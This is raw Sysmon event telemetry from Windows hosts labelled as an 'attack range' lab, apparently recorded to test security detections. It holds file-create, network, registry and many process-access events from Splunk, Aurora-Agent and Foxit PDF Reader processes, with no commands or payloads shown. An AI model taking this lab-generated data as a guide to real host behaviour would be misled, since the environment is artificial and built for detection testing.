12:20:13.861{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCBA5C481779D11D27796620E6DABCC8,SHA256=9CDEA3DB87C527546AAD8591035578379B1CB6DC2B6EBF0FAE39F57A4897E1E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015974Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:13.154{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F20FB8F41D18A961520310FC01C3D42,SHA256=AD610A749B596D576CD85D1A178BEEAC2A42DBAF45E555BBE4E86F718909860A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.948{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A01094000E55CEE40DCCDB6F896725,SHA256=4F552D51F587EF41DDF97B848036EC48A122A71170485831F297A041D99DA040,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015976Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:12.085{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50075-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015975Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:14.247{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF48232690C71DC0538028710BBA47F,SHA256=35105AB1AA516713CFA7D9BEE3321E76486DD5FAEE24562EE0FF91E14FA2A0E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.736{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.528{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=C47C3260A1393792899F7083D65EA6B9,SHA256=358D8A718C03A019D64845D0A809425313C70DC8F7B973DB545E127C04732D85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.221{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.220{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000015977Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:15.319{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73F7461DB15266C6FE9E3563A5467331,SHA256=D7A626B794683D4685B95D57CD5FF505A46AAD0B2AE3AF9905A09A5B0DC57135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015979Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:16.402{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246F9004665F1D32EE3D6DAAFAF59EB3,SHA256=BB1D728D0E80880A44708A0A623EE4427BBF4A440775A8B0CDC918C7881CF55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015978Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:16.386{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=AF650FEAB06C60404B4CBECECE0DF6B7,SHA256=8C320C30A1BE205FCA6691B6345CE89CB9FA40D2E21A40C362288CF98F946224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:16.022{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3C988FF2AC66690BF931AE85D60E3B,SHA256=2E42D7A2281643128F9C179E91AD85E31DA9227DB648EB0D0755283FE492A9CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015990Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:17.492{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E06CFCFD0B0B6BFB44BB281667CE015,SHA256=1570AA65C6EFDD756D28A32148C5E230EF9CD648971F67C2D68D9E60D114D012,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000015989Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000015988Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001e49f7) 13241300x800000000000000015987Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2e-0xd7c4b8aa) 